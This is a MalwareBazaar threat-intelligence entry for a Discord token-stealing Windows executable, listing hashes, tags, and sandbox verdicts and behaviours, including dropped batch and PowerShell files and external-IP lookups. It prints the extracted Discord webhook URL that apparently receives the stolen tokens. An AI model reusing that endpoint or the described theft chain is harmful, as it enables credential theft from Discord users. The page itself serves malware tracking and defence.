MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 04ff00131dc81c785b075d33b1ab543f68e3aafa4ed1d52f8a19d16cbf66f3f2. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry


Threat unknown


Vendor detections: 10


Intelligence 10 IOCs YARA File information Comments
Download sample Add tag Delete this sample Report a False Positive

SHA256 hash: 04ff00131dc81c785b075d33b1ab543f68e3aafa4ed1d52f8a19d16cbf66f3f2
SHA3-384 hash: 1915eb5be329840a2f7d6c4a9e930536ddced756fd1beaa3442f4c4a24ce36e6da34c5007a943006b02460226046d1aa
SHA1 hash: 609221531540e07f89dcbcfea6332903614cf1ce
MD5 hash: 1bcbb999e7aad815efc1036324443310
humanhash: happy-fifteen-sad-winner
File name:47ee7c873ff6ad620d68f6bd92cbd41ae0194c446720228f805f3487192dd909
Download: download sample
File size:82'432 bytes
First seen:2022-02-28 07:46:04 UTC
Last seen:Never
File type:Executable exe
MIME type:application/x-dosexec
imphash 60b73d3072a0d10df2e877c7d40aea75
ssdeep 1536:2OXQrSji6XN9+GVqQ7zgN9ebqvjoJExemw2Dc:2OXQA+QqQfgNY0emj
Threatray 1'270 similar samples on MalwareBazaar
TLSH T19A831A5B236410DDC6A741B4CE61370AD7B1B0690F22A3CF0BB8C69A6F179E1AF78355
Reporter struppigel
Tags:batch batch2exe cordimik DiscordTokenStealer exe powershell

Intelligence

File Origin
# of uploads :
1
# of downloads :
223
Origin country :
n/a
Vendor Threat Intelligence
Detection:
n/a
Link:
https://www.capesandbox.com/analysis/245163/
Result
Verdict:
Suspicious
Maliciousness:

Behaviour
Creating a window
Creating a file in the %temp% subdirectories
Running batch commands
Launching a process
DNS request
Sending a custom TCP request
Sending an HTTP GET request
Creating a file
Сreating synchronization primitives
Creating a process from a recently created file
Searching for the window
Result
Malware family:
n/a
Score:
  5/10
Tags:
n/a
Link:
https://dragonfly.certego.net/analysis/7572/overview
Behaviour
MalwareBazaar
Verdict:
Suspicious
Threat level:
  5/10
Confidence:
100%
Tags:
shell32.dll
Link:
https://www.filescan.io/uploads/621c7dbf0cd58dbd92512fb0/reports/dd169f32-c2c4-4e91-a954-b0f8e3eed7ae/overview
Result
Verdict:
MALICIOUS
Details
Windows PE Executable
Found a Windows Portable Executable (PE) binary. Depending on context, the presence of a binary is suspicious or malicious.
Malware family:
Malicious Packer
Create hunting rule
Verdict:
Malicious
Link:
https://analyze.intezer.com/analyses/a7dbd28b-4f66-4085-a6bf-ebb92ac938db
Result
Threat name:
Unknown
Detection:
malicious
Classification:
troj.spyw.evad
Score:
80 / 100
Link:
https://www.joesandbox.com/analysis/947165
Signature
Machine Learning detection for sample
May check the online IP address of the machine
Multi AV Scanner detection for submitted file
Sigma detected: Check external IP via Powershell
Sigma detected: Suspicious Script Execution From Temp Folder
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Yara detected BatToExe compiled binary
Behaviour
Behavior Graph:
Download SVG
behaviorgraph top1 signatures2 2 Behavior Graph ID: 579649 Sample: 47ee7c873ff6ad620d68f6bd92c... Startdate: 28/02/2022 Architecture: WINDOWS Score: 80 51 Multi AV Scanner detection for submitted file 2->51 53 Sigma detected: Check external IP via Powershell 2->53 55 Machine Learning detection for sample 2->55 57 2 other signatures 2->57 8 47ee7c873ff6ad620d68f6bd92cbd41ae0194c446720228f805f3487192dd909.exe 5 2->8         started        process3 file4 35 C:\Users\user\AppData\Local\...\Token.bat, ASCII 8->35 dropped 11 cmd.exe 2 8->11         started        15 conhost.exe 8->15         started        process5 file6 37 C:\Users\user\AppData\Local\Temp\bnt.ps1, ASCII 11->37 dropped 59 Uses ping.exe to sleep 11->59 61 Uses ping.exe to check the status of other devices and networks 11->61 17 cmd.exe 1 11->17         started        20 cmd.exe 1 11->20         started        22 powershell.exe 19 11->22         started        25 3 other processes 11->25 signatures7 process8 dnsIp9 49 Uses ping.exe to sleep 17->49 27 PING.EXE 1 17->27         started        30 findstr.exe 1 17->30         started        32 powershell.exe 14 17 20->32         started        39 discord.com 162.159.135.232, 443, 49742, 49768 CLOUDFLARENETUS United States 25->39 signatures10 process11 dnsIp12 41 192.168.2.7 unknown unknown 27->41 43 api.ipify.org.herokudns.com 52.20.78.240, 49754, 80 AMAZON-AESUS United States 32->43 45 api.ipify.org 32->45 47 May check the online IP address of the machine 32->47 signatures13
Detection:
n/a
Link:
https://mwdb.cert.pl/sample/04ff00131dc81c785b075d33b1ab543f68e3aafa4ed1d52f8a19d16cbf66f3f2/
Threat name:
Win64.Infostealer.Disco
Create hunting rule
Status:
Malicious
First seen:
2022-02-28 07:46:11 UTC
File Type:
PE+ (Exe)
Extracted files:
2
AV detection:
11 of 28 (39.29%)
Threat level:
  5/5
Verdict:
malicious
Similar samples:
2560cc6fef94164b1e60d22763fc15dfb84314b6b5f7f581b1ea3a09af2e3021
4d041237f6dbd08e6d88a1a526fa2dc3f1e4ce19348200105a0fa749195bce36
668c5486d1680bd9bb7f687ff7573b53d22d594937083fd8e752062f7f9fd6e7
74b7528c14d3fce44accbb5d32e5d057673c3832d065db1040db2959b78bfe26
8ccaed7c504359bba64e038edf5284fc059e34c7f57793b223b92704efe4d028
9c07c93f9a190f10c080d8077dd34db1deb715a4e928509767c9b80a36ce8753
b999ca69b211c89b669c18ec8543d34f203f73a1c793db6d481da5c917c3f116
bc73cd93e40c3f14501d016a393f95d4a481a5a7d2fbbf99a6dc5e2b88156885
d4559408b4677ad7be56e939a5cd9fa91fd79bdb46c8e28c0e9cf2b333a3519f
+ 1'260 additional samples on MalwareBazaar
Result
Malware family:
n/a
Score:
  10/10
Tags:
n/a
Link:
https://tria.ge/reports/220228-jlztrafabq/
Behaviour
Delays execution with timeout.exe
Runs ping.exe
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Looks up external IP address via web service
Blocklisted process makes network request
Malware Config
Dropper Extraction:
https://discord.com/api/webhooks/947523898352763001/gIjqjRvqoxzCBCvDzpPxPasv0cyqXR86gT3F-m2J9Jygqi1mA3x5pl_OEYm5QkgHToePoo
Unpacked files
SH256 hash:
04ff00131dc81c785b075d33b1ab543f68e3aafa4ed1d52f8a19d16cbf66f3f2
MD5 hash:
1bcbb999e7aad815efc1036324443310
SHA1 hash:
609221531540e07f89dcbcfea6332903614cf1ce
Link:
https://www.unpac.me/results/3d0d269f-eff3-468d-96a9-fe75989d2f4c/
Please note that we are no longer able to provide a coverage score for Virus Total.
Threat name:
Malicious File
Score:
1.00
Link:
https://yomi.yoroi.company/submissions/04ff00131dc81c785b075d33b1ab543f68e3aafa4ed1d52f8a19d16cbf66f3f2

File information

The table below shows additional information about this malware sample such as delivery method and external references.

Cape
Cape
https://www.capesandbox.com/analysis/245163/

Comments